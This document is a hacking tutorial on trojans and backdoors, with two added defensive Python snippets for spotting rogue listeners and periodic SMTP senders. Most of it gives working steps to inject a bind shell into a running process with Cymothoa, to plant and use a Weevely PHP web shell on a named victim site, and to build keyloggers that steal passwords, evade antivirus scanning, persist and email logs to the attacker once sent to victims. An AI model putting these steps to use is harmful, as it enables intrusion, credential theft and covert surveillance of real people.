Trojans & Backdoors
Cymothoa is a stealth backdooring tool that injects backdoor shellcode into an existing process. The tool uses the ptrace library (available on nearly all *nix systems) to manipulate processes and infect them. Keep in mind that it is a runtime injector, so it only works on applications that are already running.
Open your backtrack terminal and type cd /pentest/backdoors/cymothoa
Now type ./cymothoa
The main syntax is: ./cymothoa -p <pid> -s <shellcode_number> [options]
Now type ./cymothoa -S for a list of all available shellcodes
To infect a currently running process, first list the live processes by typing ps -aux
I launch a dictionary application to attach to, then type ./cymothoa -p 1510 -s 0 -y 4444
| -p | process ID 1510 |
| -s | shellcode number 0: bind /bin/sh to the provided port (requires -y) |
| -y 4444 | opens a shell on port 4444 |
You can potentially inject any type of backdoor into any program or application of the system. Because it’s a realtime process, it only works on systems you have access to. Once compromised, Cymothoa should be copied to the victim machine to generate stealthy backdoor shells.
Now scan the PC with nmap: nmap -sV 192.168.1.3 (victim IP)
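From the defender's side, the bind shell described above shows up as a new listening socket owned by an otherwise ordinary process. The following is an added example, not part of the original page or of Cymothoa: it parses /proc/net/tcp text and flags listeners outside an approved baseline. The sample table, baseline ports and function names are assumptions constructed for illustration.

```python
import os
import socket

# Constructed sample in /proc/net/tcp format (not captured from a real host).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 11001 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   105        0 11002 1 0000000000000000 100 0 0 10 0
   2: 00000000:115C 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 11003 1 0000000000000000 100 0 0 10 0
   3: 0301A8C0:0016 0201A8C0:C350 01 00000000:00000000 02:000A0000 00000000     0        0 11004 2 0000000000000000 20 4 30 10 -1
"""

TCP_LISTEN = "0A"  # state code the kernel prints for listening sockets

def parse_listeners(text):
    """Return (ip, port, uid, inode) for every listening IPv4 socket."""
    out = []
    for line in text.splitlines()[1:]:  # skip the header row
        f = line.split()
        if len(f) < 10 or f[3] != TCP_LISTEN:
            continue
        hex_ip, hex_port = f[1].split(":")
        # Address bytes are reversed; assumes a little-endian host such as x86.
        ip = socket.inet_ntoa(bytes.fromhex(hex_ip)[::-1])
        out.append((ip, int(hex_port, 16), int(f[7]), int(f[9])))
    return out

def unexpected_listeners(listeners, baseline_ports):
    """Listeners whose port is not in the host's approved baseline."""
    return [l for l in listeners if l[1] not in baseline_ports]

def pids_for_inode(inode):
    """Live hosts only: find PIDs holding the socket inode via /proc/<pid>/fd."""
    target, pids = f"socket:[{inode}]", []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            fds = os.listdir(f"/proc/{pid}/fd")
            if any(os.readlink(f"/proc/{pid}/fd/{fd}") == target for fd in fds):
                pids.append(int(pid))
        except OSError:
            continue  # process exited or permission denied
    return pids

if __name__ == "__main__":
    # Assumed baseline for this constructed host: SSH and a local database.
    for ip, port, uid, inode in unexpected_listeners(
            parse_listeners(SAMPLE_PROC_NET_TCP), baseline_ports={22, 3306}):
        print(f"unexpected listener {ip}:{port} uid={uid} inode={inode}")
```

On a live host, pass the contents of /proc/net/tcp and resolve each flagged inode with pids_for_inode to see which process owns the socket. Setting kernel.yama.ptrace_scope to 1 or higher limits which processes an unprivileged user can attach to with ptrace.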
Weevely is a stealth PHP web shell that simulates a telnet-like connection. It is an essential tool for web application testing post exploitation, and can be used as a stealth backdoor web shell to manage legit web accounts, even free hosted ones. It is currently included in Backtrack and Backbox and other Linux distributions for penetration testing.
Open your backtrack terminal and type cd /pentest/backdoors/web/weevely
Now type ./weevely.py generate <password> <location where you want to save the file>. It will look something like this:
./weevely.py generate rajchandel (Password) /root/Desktop
Then upload that file to the victim server. After uploading it, copy the URL of your uploaded file. Then type ./weevely.py <url> <password>. It will look something like this:
./weevely.py http://telecallerjobs.com/webdoor.php rajchandel
uname -a – print all information
free – display information about free and used memory on the system
pwd – print name of current/working directory
df – displays the amount of disk space available on the filesystem containing each file name argument
w – displays information about the users currently on the machine, and their processes
ls – list information about the FILEs (the current directory by default)
First Download Project Neptune Keylogger
Open the program
Double click on the program where you downloaded it
First check the button that says “Use Email for Storing Logs”. Then change how often the Keylogger sends logs.
In the Email Settings tab, keep “smtp.gmail.com” and the port number 587. Where it says “Email to Send Keystroke Logs”, put your email in that box, and in the box under that put the password to your email.
If you want, you can change which email it sends the logs to, but otherwise use the same email that you put above.
Then, Click Test Email Account Information, and if you get an email saying that it works, then you can move onto the next step.
Keep all the settings the same, unless you want to disable Task Manager or block websites. Here we add some online virus-scanning sites to the block list, which means that those sites can’t scan the tool for viruses.
Go to the installation tab and check the first box in “Startup Settings” Then Choose a place to install in the Installation Directory.
In the Installation Directory I would put it in the “AppData Folder”.
Then go to Original File and check “Do Nothing with Original File after Install” to keep the suspicion level at none.
If you want File downloading enabled then type in the link of your exe or other file, but if not then do nothing with this box.
Now go to the ‘Server Creation’ tab and press ‘Generate New Server’ under ‘Server Creation’, give your Keylogger a name, and that’s it… You are done.
You have successfully created a Keylogger server file. Now, simply send this file to your victim via email. Once the victim runs our Keylogger, we will receive key logs every 20 min via email.
First download Rin Logger.
Run the keylogger file on your pc and click on “Create new”
Now, enter the information as follows:
Email address: your email address (gmail recommended)
Account Password: Password of your Email address.
Keylogger Recipients: Enter your Email address
Click on next
Now enable “Attach Screenshots” by clicking on it. Enter the duration (time in minutes) to receive email key logs. After that hit “verify now”. If you get a message saying verified, you’re good to go; click next.
Now enable the “Install Keylogger” by clicking on it.
Name the file anything you want and select Installation path as “Application Data”, click next
Click on Next
Now, “Enable Website Viewer” by clicking on it.
Click on Next option.
Now, Enable the “Enable File Binder”.
Click on next
Now Enable the “Steal Password”
Click on Next
Fill all the information by yourself. And click on next.
Now, hit on “Save As” and select the location where you want to save your keylogger server file.
And click on “Compile Server”. Now Compile has been done.
You have successfully created a keylogger server file. Now, simply send this file to your victim via email. Once the victim runs our keylogger, we will receive key logs every 10 min via email.
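Both keylogger walkthroughs above (Project Neptune every 20 minutes, Rin Logger every 10) end with mail leaving the workstation on a fixed timer, which is a usable detection signal. The following is an added example, not part of the original page or of either tool: it flags non-mail processes that connect to SMTP submission port 587 at near-constant intervals. The log format, host names, process names and thresholds are constructed assumptions, and it assumes both tools send on port 587 as the Neptune settings show.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed connection records: "<ISO time> <host> <process> <dest port>".
SAMPLE_LOG = """\
2024-05-06T09:00:04 ws-17 updater32.exe 587
2024-05-06T09:03:00 ws-22 backup-agent.exe 587
2024-05-06T09:10:00 ws-22 backup-agent.exe 587
2024-05-06T09:12:41 ws-17 thunderbird.exe 587
2024-05-06T09:20:05 ws-17 updater32.exe 587
2024-05-06T09:40:03 ws-17 updater32.exe 587
2024-05-06T10:00:06 ws-17 updater32.exe 587
2024-05-06T10:20:04 ws-17 updater32.exe 587
2024-05-06T10:45:00 ws-22 backup-agent.exe 587
2024-05-06T10:50:00 ws-22 backup-agent.exe 587
2024-05-06T11:47:02 ws-17 thunderbird.exe 587
2024-05-06T13:00:00 ws-22 backup-agent.exe 587
"""

# Assumed allowlist of legitimate mail clients for this environment.
APPROVED_MAIL_CLIENTS = {"thunderbird.exe", "outlook.exe"}

def periodic_smtp_senders(log, approved, min_events=4, max_cv=0.1):
    """Return (host, process, mean_interval_minutes) for timer-like senders.

    A sender is flagged when it is not an approved mail client, has at
    least min_events connections to port 587, and the coefficient of
    variation (stdev / mean) of the gaps between them is at most max_cv.
    """
    seen = defaultdict(list)
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, host, proc, port = line.split()
        if port == "587" and proc.lower() not in approved:
            seen[(host, proc)].append(datetime.fromisoformat(ts))
    hits = []
    for (host, proc), times in sorted(seen.items()):
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if (len(times) >= min_events and mean(gaps) > 0
                and pstdev(gaps) / mean(gaps) <= max_cv):
            hits.append((host, proc, round(mean(gaps) / 60, 1)))
    return hits

if __name__ == "__main__":
    for host, proc, minutes in periodic_smtp_senders(SAMPLE_LOG, APPROVED_MAIL_CLIENTS):
        print(f"{host}: {proc} sends on port 587 about every {minutes} min")
```

The irregular sender on ws-22 is not flagged because its gaps vary widely; pair a hit with a check of per-user startup entries that point into the AppData folder, the install location the Neptune steps choose.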